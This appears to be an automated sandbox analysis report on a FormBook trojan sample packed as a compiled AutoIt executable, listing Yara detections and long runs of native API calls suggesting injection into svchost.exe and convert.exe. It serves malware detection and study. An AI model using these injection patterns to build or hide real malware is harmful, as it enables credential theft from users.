            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0089CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_0089CDAC

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2571476306.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4571790070.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4580723330.0000000005200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4568789406.0000000000230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4571023463.0000000002870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2571552452.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4578971846.0000000003210000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2572095157.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2571476306.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4571790070.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.4580723330.0000000005200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4568789406.0000000000230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4571023463.0000000002870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2571552452.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4578971846.0000000003210000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2572095157.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: This is a third-party compiled AutoIt script.1_2_00813B4C
            Source: hkLFB22XxS.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: hkLFB22XxS.exe, 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_92048b26-d
            Source: hkLFB22XxS.exe, 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_cc3b59bc-a
            Source: hkLFB22XxS.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f3d8992e-4
            Source: hkLFB22XxS.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_777ff0bd-c
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042B253 NtClose,2_2_0042B253
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72B60 NtClose,LdrInitializeThunk,2_2_02F72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_02F72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_02F72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F735C0 NtCreateMutant,LdrInitializeThunk,2_2_02F735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F74340 NtSetContextThread,2_2_02F74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F74650 NtSuspendThread,2_2_02F74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72AF0 NtWriteFile,2_2_02F72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72AD0 NtReadFile,2_2_02F72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72AB0 NtWaitForSingleObject,2_2_02F72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BF0 NtAllocateVirtualMemory,2_2_02F72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BE0 NtQueryValueKey,2_2_02F72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BA0 NtEnumerateValueKey,2_2_02F72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72B80 NtQueryInformationFile,2_2_02F72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72EE0 NtQueueApcThread,2_2_02F72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72EA0 NtAdjustPrivilegesToken,2_2_02F72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72E80 NtReadVirtualMemory,2_2_02F72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72E30 NtWriteVirtualMemory,2_2_02F72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72FE0 NtCreateFile,2_2_02F72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72FB0 NtResumeThread,2_2_02F72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72FA0 NtQuerySection,2_2_02F72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F90 NtProtectVirtualMemory,2_2_02F72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F60 NtCreateProcessEx,2_2_02F72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F30 NtCreateSection,2_2_02F72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CF0 NtOpenProcess,2_2_02F72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CC0 NtQueryVirtualMemory,2_2_02F72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CA0 NtQueryInformationToken,2_2_02F72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C60 NtCreateKey,2_2_02F72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C00 NtQueryInformationProcess,2_2_02F72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72DD0 NtDelayExecution,2_2_02F72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72DB0 NtEnumerateKey,2_2_02F72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D30 NtUnmapViewOfSection,2_2_02F72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D10 NtMapViewOfSection,2_2_02F72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D00 NtSetInformationFile,2_2_02F72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73090 NtSetValueKey,2_2_02F73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73010 NtOpenDirectoryObject,2_2_02F73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F739B0 NtGetContextThread,2_2_02F739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73D70 NtOpenThread,2_2_02F73D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73D10 NtOpenProcessToken,2_2_02F73D10
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E24340 NtSetContextThread,LdrInitializeThunk,8_2_02E24340
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E24650 NtSuspendThread,LdrInitializeThunk,8_2_02E24650
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22AF0 NtWriteFile,LdrInitializeThunk,8_2_02E22AF0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22AD0 NtReadFile,LdrInitializeThunk,8_2_02E22AD0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22BE0 NtQueryValueKey,LdrInitializeThunk,8_2_02E22BE0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_02E22BF0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_02E22BA0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22B60 NtClose,LdrInitializeThunk,8_2_02E22B60
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22EE0 NtQueueApcThread,LdrInitializeThunk,8_2_02E22EE0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_02E22E80
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22FE0 NtCreateFile,LdrInitializeThunk,8_2_02E22FE0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22FB0 NtResumeThread,LdrInitializeThunk,8_2_02E22FB0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22F30 NtCreateSection,LdrInitializeThunk,8_2_02E22F30
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_02E22CA0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22C60 NtCreateKey,LdrInitializeThunk,8_2_02E22C60
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_02E22C70
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_02E22DF0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22DD0 NtDelayExecution,LdrInitializeThunk,8_2_02E22DD0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_02E22D30
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22D10 NtMapViewOfSection,LdrInitializeThunk,8_2_02E22D10
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E235C0 NtCreateMutant,LdrInitializeThunk,8_2_02E235C0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E239B0 NtGetContextThread,LdrInitializeThunk,8_2_02E239B0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22AB0 NtWaitForSingleObject,8_2_02E22AB0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22B80 NtQueryInformationFile,8_2_02E22B80
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22EA0 NtAdjustPrivilegesToken,8_2_02E22EA0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22E30 NtWriteVirtualMemory,8_2_02E22E30
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22FA0 NtQuerySection,8_2_02E22FA0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22F90 NtProtectVirtualMemory,8_2_02E22F90
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22F60 NtCreateProcessEx,8_2_02E22F60
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22CF0 NtOpenProcess,8_2_02E22CF0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22CC0 NtQueryVirtualMemory,8_2_02E22CC0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22C00 NtQueryInformationProcess,8_2_02E22C00
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22DB0 NtEnumerateKey,8_2_02E22DB0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E22D00 NtSetInformationFile,8_2_02E22D00
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E23090 NtSetValueKey,8_2_02E23090
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E23010 NtOpenDirectoryObject,8_2_02E23010
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E23D70 NtOpenThread,8_2_02E23D70
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E23D10 NtOpenProcessToken,8_2_02E23D10
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_002579F0 NtCreateFile,8_2_002579F0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_00257B50 NtReadFile,8_2_00257B50
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_00257C40 NtDeleteFile,8_2_00257C40
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_00257CE0 NtClose,8_2_00257CE0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_00257E40 NtAllocateVirtualMemory,8_2_00257E40
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008740B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,1_2_008740B1
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00868858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,1_2_00868858
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0087545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_0087545F
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0081E8001_2_0081E800
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0083DBB51_2_0083DBB5
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0089804A1_2_0089804A
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0081E0601_2_0081E060
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008241401_2_00824140
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008324051_2_00832405
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008465221_2_00846522
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008906651_2_00890665
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0084267E1_2_0084267E
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0083283A1_2_0083283A
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008268431_2_00826843
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008489DF1_2_008489DF
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00846A941_2_00846A94
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00890AE21_2_00890AE2
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00828A0E1_2_00828A0E
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0086EB071_2_0086EB07
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00878B131_2_00878B13
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0083CD611_2_0083CD61
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008470061_2_00847006
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008231901_2_00823190
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0082710E1_2_0082710E
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008112871_2_00811287
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008333C71_2_008333C7
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0083F4191_2_0083F419
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008256801_2_00825680
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008316C41_2_008316C4
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008258C01_2_008258C0
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008378D31_2_008378D3
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00831BB81_2_00831BB8
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00849D051_2_00849D05
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0081FE401_2_0081FE40
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00831FD01_2_00831FD0
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0083BFE61_2_0083BFE6
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_024435D01_2_024435D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010002_2_00401000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028202_2_00402820
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004100832_2_00410083
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1032_2_0040E103
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011902_2_00401190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004033002_2_00403300
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004025C02_2_004025C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FE632_2_0040FE63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042D6932_2_0042D693
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041672E2_2_0041672E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004167332_2_00416733
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC02C02_2_02FC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE02742_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030003E62_2_030003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F02_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA3522_2_02FFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030001AA2_2_030001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD20002_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF81CC2_2_02FF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF41A22_2_02FF41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC81582_2_02FC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA1182_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F301002_2_02F30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5C6E02_2_02F5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3C7C02_2_02F3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F407702_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F647502_2_02F64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEE4F62_2_02FEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030005912_2_03000591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF24462_2_02FF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE44202_2_02FE4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F405352_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA802_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF6BD72_2_02FF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFAB402_2_02FFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E8F02_2_02F6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F268B82_2_02F268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300A9A62_2_0300A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4A8402_2_02F4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F428402_2_02F42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A02_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F569622_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFEEDB2_2_02FFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52E902_2_02F52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFCE932_2_02FFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40E592_2_02F40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFEE262_2_02FFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4CFE02_2_02F4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32FC82_2_02F32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBEFA02_2_02FBEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB4F402_2_02FB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60F302_2_02F60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE2F302_2_02FE2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F82F282_2_02F82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30CF22_2_02F30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0CB52_2_02FE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40C002_2_02F40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3ADE02_2_02F3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F58DBF2_2_02F58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDCD1F2_2_02FDCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4AD002_2_02F4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE12ED2_2_02FE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5B2C02_2_02F5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F452A02_2_02F452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F8739A2_2_02F8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2D34C2_2_02F2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF132D2_2_02FF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF70E92_2_02FF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFF0E02_2_02FFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEF0CC2_2_02FEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F470C02_2_02F470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300B16B2_2_0300B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4B1B02_2_02F4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F1722_2_02F2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7516C2_2_02F7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF16CC2_2_02FF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F856302_2_02F85630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFF7B02_2_02FFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F314602_2_02F31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFF43F2_2_02FFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030095C32_2_030095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDD5B02_2_02FDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF75712_2_02FF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEDAC62_2_02FEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDDAAC2_2_02FDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F85AA02_2_02F85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE1AA32_2_02FE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB3A6C2_2_02FB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFA492_2_02FFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF7A462_2_02FF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB5BF02_2_02FB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7DBF92_2_02F7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5FB802_2_02F5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFB762_2_02FFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F438E02_2_02F438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAD8002_2_02FAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F499502_2_02F49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5B9502_2_02F5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD59102_2_02FD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F49EB02_2_02F49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F03FD22_2_02F03FD2
